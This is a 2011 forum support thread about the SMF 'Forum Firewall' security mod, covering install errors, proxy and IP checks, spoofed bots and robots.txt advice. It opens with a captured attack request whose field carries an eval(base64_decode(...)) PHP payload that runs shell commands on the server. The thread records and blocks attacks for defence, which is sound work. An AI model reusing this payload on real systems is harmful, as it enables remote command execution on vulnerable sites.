POSTsend-contactus: 1 author_name: eval(base64_decode('ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ=='));die; /smf/index.php//contact.php HTTP/1.0 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6

------------ next one below

Hack: cache!

Detail : 72.50.83.89
POST /smf/mobiquo/mobiquo.php?nocache=634331980101810000 HTTP/1.0 NativeHost file:///Applications/Install/9A096F03-F1DA-DF11-A844-00237DE2DB9E/Install/
Title: Re: Forum Firewall
Post by: lethal-danger on February 14, 2011, 10:52:47 AM
The firewall mod seemed to download and install, but the admin tabs aren't displaying, and the option screen seems to be incomplete.  I am using smf 1.1.13

Thank you for any help
Title: Re: Forum Firewall
Post by: Bigguy on February 14, 2011, 03:33:38 PM
Quote from: ljunatic on February 13, 2011, 08:32:26 PM
I see the update for 1.1.13 is out. THANKS!


Should I uninstall and reinstall to get the upgrade?

Yes I think it would be a good idea. :)
Title: Re: Forum Firewall
Post by: butchs on February 14, 2011, 06:46:52 PM
Quote from: MCK on February 14, 2011, 12:55:31 AM
Seeing some new type of attacks in my logs that I didn't see before.  In case this is of interest.

Request Entity Attack: base64_decode!

Oh, that was a nasty one.  It is meant to exploit e107 contact (http://shawnjefferson.blogspot.com/).
???
Title: Re: Forum Firewall
Post by: butchs on February 14, 2011, 06:48:52 PM
Quote from: lethal-danger on February 14, 2011, 10:52:47 AM
The firewall mod seemed to download and install, but the admin tabs aren't displaying, and the option screen seems to be incomplete.  I am using smf 1.1.13

It works in the default theme.  Possibly you need to reinstall the mod or fix SMF.  I can not help much with the latter.
Title: Re: Forum Firewall
Post by: ljunatic on February 14, 2011, 08:45:09 PM
Quote from: Bigguy on February 14, 2011, 03:33:38 PM
Quote from: ljunatic on February 13, 2011, 08:32:26 PM
I see the update for 1.1.13 is out. THANKS!


Should I uninstall and reinstall to get the upgrade?

Yes I think it would be a good idea. :)
Thanks

The update did ask for the old version to be uninstalled first.
Title: Re: Forum Firewall
Post by: lethal-danger on February 14, 2011, 11:57:32 PM
Well I installed a new SMF 1.1.13 and the latest Forum Firewall.  It downloads and installs fine, but when I'm redirected to the settings page, I only see some options but no tabs...  It's almost like I don't have permissions set correctly for it to install, but the others mods worked ok...

Im stumped!
Title: Re: Forum Firewall
Post by: lethal-danger on February 15, 2011, 12:28:27 AM
Even tried SMF 1.1.12
Title: Re: Forum Firewall
Post by: butchs on February 15, 2011, 05:29:08 AM
Sounds like your browser configuration is off.
Title: Re: Forum Firewall
Post by: butchs on February 15, 2011, 07:35:55 PM
All.  There is no "ForumFirewall.english-utf8.php" file in this version of the mod.  if you require it please copy and rename the "ForumFirewall.english.php" file.
Title: Re: Forum Firewall
Post by: DarkBlizz on February 17, 2011, 07:31:33 AM
Anyone verify if 66.249.71.141 is an authentic google bot IP and not some spoof.  It does trace back to Google's HQ though.  Also if it is authentic, would the correct user-agent for it be:
Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
This IP comes through my site a lot and is gets picked up as a DOS attack and is auto-banned.  Although through Google Webmaster Tools, there are no crawl errors that would seem it gets blocked.
Wanted to make sure it was real before adding it to the whitelist.

Also a suggestion for the EMail notification; if it could also include in the email msg the ID/IP, so one could go back to the Visitor Log and easily look it up. 

~cheers

(edit: Yep looks like its the correct user-agent, currently that IP is browsing forum without being banned ;) )
Title: Re: Forum Firewall
Post by: ExWizzard on February 17, 2011, 12:00:00 PM
Can you please explain "Proxy bypass protection" a bit more? i got over 35000 log entrys in a few hours after enabling this :/
Title: Re: Forum Firewall
Post by: butchs on February 17, 2011, 07:11:30 PM
Quote from: ExWizzard on February 17, 2011, 12:00:00 PM
Can you please explain "Proxy bypass protection" a bit more? i got over 35000 log entrys in a few hours after enabling this :/

Uncheck "Enable Bypass Protection", I bet it is set incorrectly.  make sure "Block Violations" is not checked until you work out the bugs in your settings.
Title: Re: Forum Firewall
Post by: butchs on February 17, 2011, 07:18:36 PM
Quote from: DarkBlizz on February 17, 2011, 07:31:33 AM
Anyone verify if 66.249.71.141 is an authentic google bot IP and not some spoof...

(edit: Yep looks like its the correct user-agent, currently that IP is browsing forum without being banned ;) )

It is easy to spoof ip addresses and domain names.  Some bots are good at it,

There are two ways to try to protect against io spoofing that I use:
1.  Bad Behavior reverse ip check.  This only work if both the ip and the domain are not spoofed.
2.  DOS attack - if you set Google Webmaster Tools, robots.txt and the others to require a hit rate that is less than FF, then the mod will catch the bad guys who spoof google accounts.  So if you have everything set correctly it is rest assured you blocked a spoofed bot.

Quote from: DarkBlizz on February 17, 2011, 07:31:33 AM
Also a suggestion for the EMail notification; if it could also include in the email msg the ID/IP, so one could go back to the Visitor Log and easily look it up.  )

I will add it to the list.
:P
Title: Re: Forum Firewall
Post by: ExWizzard on February 17, 2011, 08:59:02 PM
Quote from: butchs on February 17, 2011, 07:11:30 PM
Quote from: ExWizzard on February 17, 2011, 12:00:00 PM
Can you please explain "Proxy bypass protection" a bit more? i got over 35000 log entrys in a few hours after enabling this :/

Uncheck "Enable Bypass Protection", I bet it is set incorrectly.  make sure "Block Violations" is not checked until you work out the bugs in your settings.
Yeah it was in logging mode only, i disabled it because it was causing the whole server to crawl lol. So how do you set it up correctly? The only thing i did was tick the checkbox

Also i got about 7 pages for the same user of this error

action=register2
2: htmlspecialchars() expects parameter 1 to be string, array given
File: /Sources/Subs-ForumFirewall.php
Line: 1044


Title: Re: Forum Firewall
Post by: owg on February 18, 2011, 12:58:01 AM
Hi butchs, great mod!
I've been running FF for a few days in log mode, and just now turned it to block mode.  The log was full of mostly invalid IPs, and a few DOS reports (that were actually members).  Almost immediately one of my global moderators reported that he received the 403 error page - I asked his IP and it was not in the log, but there were lots of IPs in the 10.*.*.* ranges.  I assume that one of his is one of those, but if he is using a proxy, it is a legitimate corporate proxy.  I know very little about security, most of this is new to me.  Is there a way I can find the identity of the proxy, or is there a way to pass certain invalid IPs through?

One other thing - I see an invalid IP 127.0.0.1 in the log - sorry for my ignorance - do I need to worry about the localhost IP?
Thanks!
Title: Re: Forum Firewall
Post by: Maxtor on February 18, 2011, 03:56:14 PM
i cant install it, it just returns to packages page...
Title: Re: Forum Firewall
Post by: DarkBlizz on February 18, 2011, 06:20:50 PM
Suggestion: The Visitor Log definitely needs a way to remove logs. i.e
  Apply filter of type: All Logs (192) | IP (6) | DOS (7) | SQL (179)
  [Remove Selection] [Remove All]
Title: Re: Forum Firewall
Post by: butchs on February 18, 2011, 08:20:10 PM
Quote from: owg on February 18, 2011, 12:58:01 AM
Hi butchs, great mod!
I've been running FF for a few days in log mode, and just now turned it to block mode.  The log was full of mostly invalid IPs, and a few DOS reports (that were actually members).  Almost immediately one of my global moderators reported that he received the 403 error page - I asked his IP and it was not in the log, but there were lots of IPs in the 10.*.*.* ranges.  I assume that one of his is one of those, but if he is using a proxy, it is a legitimate corporate proxy.  I know very little about security, most of this is new to me.  Is there a way I can find the identity of the proxy, or is there a way to pass certain invalid IPs through?

One other thing - I see an invalid IP 127.0.0.1 in the log - sorry for my ignorance - do I need to worry about the localhost IP?
Thanks!

If you do not know his ip or when he was there how could I help you?  As I stated in earlier posts proxys can be compromised.

Well...  The mod only inspects traffic to your site so localhost should never be seen unless you have your server in your bed room.  Traffic between SMF and the DB is not watched with this mod.

If you want invalid ips to pass then turn off the ip check.
Title: Re: Forum Firewall
Post by: owg on February 18, 2011, 09:44:06 PM
Quote from: butchs on February 18, 2011, 08:20:10 PM
If you do not know his ip or when he was there how could I help you?  As I stated in earlier posts proxys can be compromised.

Well...  The mod only inspects traffic to your site so localhost should never be seen unless you have your server in your bed room.  Traffic between SMF and the DB is not watched with this mod.

If you want invalid ips to pass then turn off the ip check.
I apologize if you think my post is unwarranted - I was just asking an honest question.  It was not necessary to be sarcastic about the localhost part - the IP was in the log.  I did not see a solution in any post in thorough searches through the forum, and this was my last resort before uninstalling, because as you also mentioned in another post, the minimum a user should have turned on is the IP check and DOS check.
Title: Re: Forum Firewall
Post by: butchs on February 19, 2011, 08:33:38 AM
Why are you putting words in my mouth?  I never said your posts were "unwarranted ".  I am trying to provide free support and I have little spare time so work with me.

I really do not know what to tell you about your moderator since you can not identify him in your visitor log.  You did not give me enough information to answer the question.

Now, since many people as getting sucked into proxys that are bad I will be adding a check box that will prevent searching the proxy list.  However, I will note that any proxy that fails the test may or may not be compromised.
Title: Re: Forum Firewall
Post by: butchs on February 19, 2011, 10:08:47 AM
New version added "Review Proxy List" check box.
O:)
Title: Re: Forum Firewall
Post by: butchs on February 19, 2011, 10:39:39 AM
Quote from: DarkBlizz on February 18, 2011, 06:20:50 PM
Suggestion: The Visitor Log definitely needs a way to remove logs. i.e
  Apply filter of type: All Logs (192) | IP (6) | DOS (7) | SQL (179)
  [Remove Selection] [Remove All]

Well the log deletes it's self every 7 days.  Sorting and etc will follow in a future version.
Title: Re: Forum Firewall
Post by: busterone on February 19, 2011, 11:08:16 AM
The bad guys must take notice of who blocks them. The first couple of weeks I ran this, there were 50 or more logged events per day. For the last 5 days, absolutely zero.   ;D
Title: Re: Forum Firewall
Post by: Blade_Runner on February 19, 2011, 01:25:28 PM
I got the following error message. It shows that an animated gif file is infected with XSS. Is it a bug or the file has been infected with xss?

HEADER
modcarclub.com/forums/avatars//!ModCarClub/poison_by_modcarclub-f.gif contains the following exploit: xml
---------------------------
REASON
FORUM INFECTED with XSS!
Title: Re: Forum Firewall
Post by: butchs on February 19, 2011, 01:32:39 PM
Quote from: Blade_Runner on February 19, 2011, 01:25:28 PM
HEADER
modcarclub.com/forums/avatars//!ModCarClub/poison_by_modcarclub-f.gif contains the following exploit: xml
---------------------------
REASON
FORUM INFECTED with XSS!


It is suspected of being infected.  The mod checks all common avatars/ smilies for code injection keywords and lists them once a week.  It is only a warning message.

The only way to determine if it is infected it to look at the code on a computer (where if there is a program embedded in it will not get infected).  Not that I know anything about that...  Or delete the file.

If it is infected it could contain:
1)  Code that will try to write cookies in all those who look at it on your site in order to get some sort of information.
2)  Download an application to a specific computer OS.
3)  Send email messages...
4)  Oh the possibilities...
;)
Title: Re: Forum Firewall
Post by: Blade_Runner on February 19, 2011, 01:37:25 PM
Quote from: butchs on February 19, 2011, 01:32:39 PM
Quote from: Blade_Runner on February 19, 2011, 01:25:28 PM
HEADER
modcarclub.com/forums/avatars//!ModCarClub/poison_by_modcarclub-f.gif contains the following exploit: xml
---------------------------
REASON
FORUM INFECTED with XSS!


It is suspected of being infected.  The mod checks all common avatars/ smilies for code injection keywords and lists them once a week.  It is only a warning message.

The only way to determine if it is infected it to look at the code on a computer (where if there is a program embedded in it will not get infected).  Not that I know anything about that...  Or delete the file.

If it is infected it could contain:
1)  Code that will try to write cookies in all those who look at it on your site in order to get some sort of information.
2)  Download an application to a specific computer OS.
3)  Send email messages...
4)  Oh the possibilities...
;)

Does an animated GIF file have embedded program? File size is the same as the one on my computer.
Title: Re: Forum Firewall
Post by: butchs on February 19, 2011, 01:44:53 PM
Quote from: Blade_Runner on February 19, 2011, 01:37:25 PM
Does an animated GIF file have embedded program? File size is the same as the one on my computer.

GIF's have scripts that allow them to be animated.  But that has nothing to do with what the mod is looking for.  It is safe to say code can be added to any file that is loaded on the internet, including GIF's.  A little is all most need.  No explanation will be provided on how.  Not that i know anything about that...  You can get more information on how at u tube.

Quote from: busterone on February 19, 2011, 11:08:16 AM
The bad guys must take notice of who blocks them. The first couple of weeks I ran this, there were 50 or more logged events per day. For the last 5 days, absolutely zero.   ;D

Congratulations the bots do not want to play with you anymore.  You will see a few stragglers testing for vulnerabilities.

There are lists out there published by the bad guys of so called "easy targets".  Not that I know anything about it...  So when they are blocked,  they take note and go elsewhere to fish for more profitable opportunities.

This is why I believe the passive approach of "SANITIZATION" does not work.  Only by being blocked will the bad bots stop visiting and remove you from the list!

:o
Title: Re: Forum Firewall
Post by: owg on February 19, 2011, 04:48:26 PM
Quote from: butchs on February 19, 2011, 08:33:38 AM
...  You did not give me enough information to answer the question.
Perhaps because I am a novice and do not know what information to supply.  I realize now that I can determine who he is by some of the information I see in the header column in the visitor log, but I did not know that until I had closely examined several pages of the log.  I guess I was trying to ask if it was possible to whitelist IPs in the IP check area - if not, all you needed say is that it is not possible.

On an aside, I highly respect the ability of you and other mod authors who have skills that I do not possess, but sometimes the replies that one receives on public forums does not exactly encourage people to post.
Title: Re: Forum Firewall
Post by: butchs on February 19, 2011, 05:02:02 PM
That is ok.  Please be patient with us.   :-X

I hope the new option will fix your issue?
Title: Re: Forum Firewall
Post by: owg on February 19, 2011, 05:48:12 PM
I believe it will.  I installed v1.06 after uninstalling v1.04, and it went perfectly.  I noticed the proxy check box was disabled by default - good move.  As you recommended, I'll watch the logs carefully for a couple of days before I turn on blocking, but if they are like the ones I've been logging for the past few days, all should proceed well.

Many thanks for all the effort you put into the mod.
Title: Re: Forum Firewall
Post by: lethal-danger on February 20, 2011, 10:33:40 AM
butchs,

When FF is running can I have enable testing, logs and block violations checked at the same time?

When I check the SQL Injection option, I get this error in my logs,

2: strpos() [<a href='function.strpos'>function.strpos</a>]: Empty delimiter

Is that FF stopping the login attempts?

Also with that Proxy Blocker mod installed I had no incorrect login attempts and didn't notice any problems with members.

As soon as I uninstalled  Proxy Blocker I installed the Login Detector patch, and have already started getting incorrect login attempts again.

I just started using mods and looking at forum protection the last couple days, since I've installed the following mods.  Let me know if you see any redundancies or conflicts...  I havn't seen any problems in the logs atm.

Proxy Blocker
Forum Firewall
Login Security
Hide Info from other guests
Stop Spammer
Hide SMF version
Stop Forum Spam
Anti bot: Unrecognizable form
Add Honey Pot to track IP
httpbl

Thanks for all the hard work guys!
Title: Re: Forum Firewall
Post by: butchs on February 20, 2011, 11:59:53 AM
Quote from: lethal-danger on February 20, 2011, 10:33:40 AM
When FF is running can I have enable testing, logs and block violations checked at the same time?

Yes.  Please note:


Quote from: lethal-danger on February 20, 2011, 10:33:40 AM
When I check the SQL Injection option, I get this error in my logs,

2: strpos() [<a href='function.strpos'>function.strpos</a>]: Empty delimiter

If you have the latest version, I have seen it several times after turning on the option.  it usually occurs when a visitor is half way through being tested and the initial data is not populated.  The mod will work fine so do not worry.

If you see it several times it could be a bot testing.  Still, the mod will work.

Quote from: lethal-danger on February 20, 2011, 10:33:40 AM
Is that FF stopping the login attempts?

Also with that Proxy Blocker mod installed I had no incorrect login attempts and didn't notice any problems with members.

As soon as I uninstalled  Proxy Blocker I installed the Login Detector patch, and have already started getting incorrect login attempts again.

If a visitor is on the log (blocking enabled) FF has blocked the attempt.

Proxy blocker blocks a bunch of proxys but not everything.  If you use "Enable IP Validation" & "Review Proxy List" you will block proxies that are either miss-configured or loaded to attack your site.  It will also block some supposedly good proxies that are incorrectly configured.  I will be concerned wit the latter because that means to me that the proxy could be compromised.  Some people have gotten all upset about it so I made it an option.

Properly set DOS protection will stop the high speed bots attempting to get passwords.  "SQL Injection", "Cross-Site Scripting" & "HTTP Header Attacks" will stop many other attacks.

Quote from: lethal-danger on February 20, 2011, 10:33:40 AM
I just started using mods and looking at forum protection the last couple days, since I've installed the following mods.  Let me know if you see any redundancies or conflicts...  I havn't seen any problems in the logs atm.

Proxy Blocker
Forum Firewall
Login Security
Hide Info from other guests
Stop Spammer
Hide SMF version
Stop Forum Spam
Anti bot: Unrecognizable form
Add Honey Pot to track IP
httpbl

I just completed a re-write of the Bad Behavior mod (http://custom.simplemachines.org/mods/index.php?mod=2502).  It is an extremely fast mod that has been around for a log time.  It is the #1 means of spam prevention for many content management systems like worldpress.  It will be a nice addition to the list.  None of it's tests are duplicated in FF.
Title: Re: Forum Firewall
Post by: Kindred on February 20, 2011, 12:30:48 PM
i will note... hide forum version is not actually any sort of protection and serves no actual purpose
Title: Re: Forum Firewall
Post by: MCK on February 20, 2011, 09:21:13 PM
butchs. thanks for your continued effort in keeping this mod up to date and meeting your user needs. In moving through few versions I observed an ongoing need to uninstall, reinstall, re-apply small fix for credits which gets a little tedious after a while.


Thanks once again for being so responsive. All the best.
Title: Re: Forum Firewall
Post by: MCK on February 20, 2011, 09:31:19 PM
Quote from: Arantor on February 20, 2011, 09:28:09 PM
QuoteCould you kindly make the mod update-friendly so one could install new version over old without uninstalling?

The only downside is that it makes maintaining the package so much more work, it might be convenient for the end user but in practice it can easily near double the development work.

Thanks for the insight. Didn't know that. Is that a one time impact or ongoing?
Title: Re: Forum Firewall
Post by: MCK on February 20, 2011, 09:36:03 PM
Quote from: Arantor on February 20, 2011, 09:33:30 PM
QuoteThanks for the insight. Didn't know that. Is that a one time impact or ongoing?

Oh, ongoing. You have to prepare a list of the changes between versions as well as the changes from SMF base, then you get into the realms of having to have upgrades between upgrades, e.g. mod 1.0.1 to mod 1.0.2 to mod 1.0.3 - all in one package. It gets messy, and can easily break - it's just cleaner to push for an uninstall between versions in all honesty.

Thanks. I understand this better now.
Title: Re: Forum Firewall
Post by: Blade_Runner on February 21, 2011, 02:12:47 PM
how can i add an ip address to the whitelist?
Title: Re: Forum Firewall
Post by: Blade_Runner on February 21, 2011, 04:06:24 PM
Under Admin, Packages-Browse Packages, it shows that I have version 1.0.5. However, the zip file on my system is 1.0.6. I cannot uninstall it now. Each time I uninstall, I get more than 10,000 error messages like the following. How can I uninstall it?

----------------------------------------------------------------------------------------------
http://modcarclub.com/forums/index.php?action=admin;area=packages;sa=uninstall2;package=ForumFirewall_1.0.6.zip;pid=157
2: feof(): supplied argument is not a valid stream resource
File: /home/newton18/public_html/modcarclub.com/forums/Sources/Subs-Package.php
Line: 2781
----------------------------------------------------------------------------------------------

http://modcarclub.com/forums/index.php?action=admin;area=packages;sa=uninstall2;package=ForumFirewall_1.0.6.zip;pid=157
2: fread(): supplied argument is not a valid stream resource
File: /home/newton18/public_html/modcarclub.com/forums/Sources/Subs-Package.php
Line: 2782
Title: Re: Forum Firewall
Post by: butchs on February 21, 2011, 09:18:47 PM
Not sure what is going on there but try turning off the mod before you uninstall.  As far as I understand none of the errors you list have something to do with the mod.  Maybe there is another mod that was installed afterwards that needs to be removed first?

If you still have issues you and replace the "Subs-ForumFirewall.php" and "ForumFirewall.english.php" (or -utf8 if you use them) files to get the upgrade.
;)
Title: Re: Forum Firewall
Post by: butchs on February 21, 2011, 09:26:06 PM
Quote from: MCK on February 20, 2011, 09:36:03 PM
Thanks. I understand this better now.

The last changed was made just as I was getting ready to go to bed last night.   So I had no time to make a revision list , not that anyone else does anyway.  :o  Lou let me have access to his forum, I performed some tests and I think I finally found the problem with all those messed up ip's.  So I rushed out a revision...  Thank you Lou!
:)
Title: Re: Forum Firewall
Post by: Glasso on February 25, 2011, 01:56:44 AM
buchs,

Your mods are fantastic, thank you very much for making them available.

1. I have installed forum firewall and most blocks are with an invalid IP. The IP reported by FF is a phrase such as 'Keep-Alive', 'unknown' etc. and not exactly a number. How can I avoid this since I tried connecting from a Nokia phone and it is blocked?

Typical blocks with invalid IP are like:
GET /forum/ HTTP/1.0 Mozilla/4.0 (compatible; MSIE 5.5; Windows 95) http://<removed>/

Similar thing with Bad Behavior where a connection is blocked from Nokia - I will post it on the relevant thread.

2. When I enable SQL Injection, though '-' is in the list of allowed characters, URLs with that symbol get blocked. Any solution to this?

I am using SMF 2.0 RC5

Thanks.
Title: Re: Forum Firewall
Post by: Jesna on February 25, 2011, 10:48:53 AM
Thanks for a great mod

Im getting this error on my page

Fatal error: Call to undefined function ffcopyright() in /home/whsforum/public_html/forum/Themes/default/index.template.php on line 525

In the bottom where there should be; Protected by Forum firewall

My line 525 is this:
', theme_copyright(), FFCopyright(), '

Is there any there can see a problem here

It shows it correct when im in the admin/forum firewall

Im using smf 1.1.13 Danish language, so was thinking if its something to do with the danish part??

/Jakob
Title: Re: Forum Firewall
Post by: butchs on February 25, 2011, 08:59:25 PM
Glasso I answered your question in the BB (http://www.simplemachines.org/community/index.php?topic=375980.0) support thread.


Jesna I did not know there was a Danish translation?   :P  Try this:
Open "$themedir/index.template.php
      Search for "global $context, $settings, $options, $scripturl, $txt;

echo
"

Replace with "global $context, $settings, $options, $scripturl, $txt, $sourcedir;

require_once($sourcedir . '/ForumFirewall.php');

echo
"

EDIT:  YOU DO NO NEED TO DO THIS IF YOU ENABLE THE MOD.   I will fix it in a future version.

8)
Title: Re: Forum Firewall
Post by: butchs on February 26, 2011, 02:41:10 PM
Quote from: Glasso on February 26, 2011, 02:14:56 PM
Butchs, if you don't mind taking a look at the Forum Firewall log with a bunch of 'keep-alive's in the IP field, please PM me your email id.

What happened in BB is not the same as FF.  BB does not look at the ip address field.  It checks the "Connection " where Keep-alive is supposed to reside.

Keep-alive's will not be allowed to pass the FF ip test in FF since they are not valid ip address.  I have seen many examples where 'keep-alive's in the IP field have been used in a site hack attack.  Allowing it to pass in FF will only be a vulnerability.

The attached file provides an example of a blocked ip address where FF stopped cold one of the many bots that have been hammering the register/login functions that so many people who do not use FF complain about.
Title: Re: Forum Firewall
Post by: Glasso on February 26, 2011, 02:49:29 PM
Oh I see, so this is fairly common error and wrong values get passed in the IP field intentionally or unintentionally.
Thanks for clarifying.
Title: Re: Forum Firewall
Post by: hartiberlin on February 27, 2011, 02:24:29 AM
Does it work together with SMF 2.0RC5 / PortaMX 1.0RC4 and PortaMX SEF
enabled ?

Many thanks.
Regards, Stefan.
Title: Re: Forum Firewall
Post by: Jesna on February 27, 2011, 06:03:45 AM
I have only enabled "Enable Testing". My log/visitors is clean. Is that because I havent enabled anything else yet? or will there first be something in the log when I enable "Block Violations" ?

/Jakob
Title: Re: Forum Firewall
Post by: butchs on February 27, 2011, 07:40:25 AM
Quote from: hartiberlin on February 27, 2011, 02:24:29 AM
Does it work together with SMF 2.0RC5 / PortaMX 1.0RC4 and PortaMX SEF
enabled ?

Not sure but, it works with SMF 2.0RC5 and SimplePortal.
Title: Re: Forum Firewall
Post by: butchs on February 27, 2011, 07:43:45 AM
Quote from: Jesna on February 27, 2011, 06:03:45 AM
I have only enabled "Enable Testing". My log/visitors is clean. Is that because I havent enabled anything else yet? or will there first be something in the log when I enable "Block Violations" ?

You should at least check:
"Enable Testing", "Logging", "DOS Attack" and "Enable IP Validation"

Run it for a few days and make sure you will not ban your critical members or yourself then select "Block Violations" to block access.

The mod has built i n help click the "?" for more information.
Title: Re: Forum Firewall
Post by: butchs on February 27, 2011, 08:18:31 AM
Update posted today.  Some of the fixes are:

1)  Copyright now showing correctly when mod is not enabled.
2)  Added 7 day auto trimming of the visitor log for SMF 1.1.x users when "Logging" is on.
3)  Minor improvements.

2.0RC2 users need not update unless they have errors in their log or wish to fix the copyright issue.

Title: Re: Forum Firewall
Post by: MCK on February 27, 2011, 08:21:59 AM
Thanks for your continued time invested in this mod. If possible, could you include perhaps a check box to control whether or not the credits are shown? It would be up to the person to honor your licensing of course but this is not so much different than how it is now if only a little more manual & tedious.
Title: Re: Forum Firewall
Post by: Jesna on February 27, 2011, 10:09:40 AM
Thanks butchs  :)

Title: Re: Forum Firewall
Post by: butchs on February 27, 2011, 02:09:10 PM
MCK sorry for all the updates.  I think I should be done debugging for a while now...   :o

Time to work on a new version and I will look into a better way to handle the licensing.
Title: Re: Forum Firewall
Post by: MCK on February 27, 2011, 08:56:37 PM
No worries. The updates are for our benefit so I appreciate your efforts and thank you. Will look forward to your next update. Regards
Title: Re: Forum Firewall
Post by: lovearat on March 01, 2011, 03:31:27 PM
I just found this awesome mod!! Thank you for all the work you did/do!!
Title: Re: Forum Firewall
Post by: ppscslv on March 02, 2011, 05:29:28 PM
Hi! I have a big problem: after I installed Forum Firewall on 1.1.13 SMF after I login I can't acces the admin panel:
(http://img854.imageshack.us/i/90399289.png/)
An Error Has Occurred!
Session verification failed. Please try logging out and back in again, and then try again.

Nor I can't post anything. How can I remove/disable the package? And yes, the violation rule was activated.
Title: Re: Forum Firewall
Post by: qtime on March 02, 2011, 06:01:38 PM
can you edit the files? If so, you can remove the code
Title: Re: Forum Firewall
Post by: busterone on March 02, 2011, 07:00:12 PM
look in your database for the table smf_settings or (whatever your prefix is)_settings  if you went with something besides the default db prefix.
change the value for forumfirewall_enable_block from 1 to 0
That will get you back in the forum.
Title: Re: Forum Firewall
Post by: butchs on March 02, 2011, 07:50:15 PM
Quote from: ppscslv on March 02, 2011, 05:29:28 PM
An Error Has Occurred!
Session verification failed. Please try logging out and back in again, and then try again.


That error is a SMF 1.1.13 bug issue and has nothing to do with this mod.
Title: Re: Forum Firewall
Post by: An0nymousHelper on March 04, 2011, 09:08:32 PM
Hey! So i've been using the mod for a while now and love it, it's great! But i've noticed that there is a person i guess trying trying to attack my site, but for some reason it doesn't show there IP it shows "Keep-Alive" What does this mean? Here are two screen shots:

(http://i976.photobucket.com/albums/ae241/An0nymousHelper/Screenshot2011-03-04at55805PM.png)

(http://i976.photobucket.com/albums/ae241/An0nymousHelper/Screenshot2011-03-04at55835PM.png)

Thats just two of them and there are quite a few more. If anyone knows what this is it would be greatly appreciated if you could let me no! Thanks!
Title: Re: Forum Firewall
Post by: An0nymousHelper on March 04, 2011, 09:14:50 PM
Oh ok, thanks for the quick response!
Title: Re: Forum Firewall
Post by: Glasso on March 05, 2011, 04:37:00 AM
Hi butchs,

Would you mind telling me if this is correct blocking? To my untrained eye, it appears to be genuine googlebot requests being blocked, as corroborated by my google webmaster logs. Thank you.

Title: Re: Forum Firewall
Post by: butchs on March 05, 2011, 08:19:45 AM
So many bots pretend to be google and etc because the google UA is generally allowed a free pass most sites.  It is the most spoofed ip and UA in the net.

2899 is from a mobile phone and as far as I know Google is not using a mobile phone.

Why would google need to find your Sources directory?  They should not be snooping there.  I think you should block access in your robots.txt file.  Making changes to your robots.txt file is a important security measure.  It keeps the good bots away from sensitive areas.  I recommend a robots.txt file like the following:

User-agent: *
Disallow: /cgi-bin/
Disallow: /smf/Sources/
Disallow: /smf/Themes/
Disallow: index.php?action=admin*
Disallow: index.php?action=calendar*
Disallow: index.php?action=login*
Disallow: index.php?action=printpage*
Disallow: index.php?action=profile*
Disallow: index.php?action=register*
Disallow: index.php?action=search*
Disallow: index.php?action=stats*
Disallow: index.php?PHPSESSID=*
Disallow: index.php?*rss*
Disallow: index.php?*wap*
Disallow: index.php?*wap2*
Disallow: index.php?wwwRedirect*
Crawl-delay: 5


The latest BB mod has a nice reverse DNS check that catches several fake bot attempts.
Title: Re: Forum Firewall
Post by: butchs on March 05, 2011, 08:33:19 AM
Quote from: An0nymousHelper on March 04, 2011, 09:08:32 PM
Thats just two of them and there are quite a few more. If anyone knows what this is it would be greatly appreciated if you could let me no! Thanks!

I would verify that the "Longterm Ban" ban is set to 1 (during the week) or 24 (weekend) hours and let SMF block it for a while.
Title: Re: Forum Firewall
Post by: Glasso on March 05, 2011, 10:43:35 AM
Quote from: butchs on March 05, 2011, 08:19:45 AM
2899 is from a mobile phone and as far as I know Google is not using a mobile phone.
I think this is the google mobile bot. In fact, I raised a similar query on Bad Behavior and got information that google mobile bot is covered in the latest code too!

Quote from: butchs on March 05, 2011, 08:19:45 AM
Why would google need to find your Sources directory?  They should not be snooping there.  I think you should block access in your robots.txt file.  Making changes to your robots.txt file is a important security measure.  It keeps the good bots away from sensitive areas.  I recommend a robots.txt file like the following:...
I now understand 'Hack: Sources!' means an attempt to snoop into the Sources directory  - I have applied the additional blocks in robot.txt now as you suggest, thank you.

Quote from: butchs on March 05, 2011, 08:19:45 AM
The latest BB mod has a nice reverse DNS check that catches several fake bot attempts.
Butchs, this is causing some genuine googlebot requests to be blocked as I see in my webmaster logs. I can send you some trail that I had with Michael where he thought roundtripdns is not fully reliable, if you believe it is worthwhile to go deeper.

Again, I can't thank you guys enough for this great work.

Title: Re: Forum Firewall
Post by: butchs on March 05, 2011, 01:56:58 PM
 The latest version of  BB mod (http://www.simplemachines.org/community/index.php?topic=375980.0) includes the Google Wireless Transcoder changes and as such you should not get blocked.

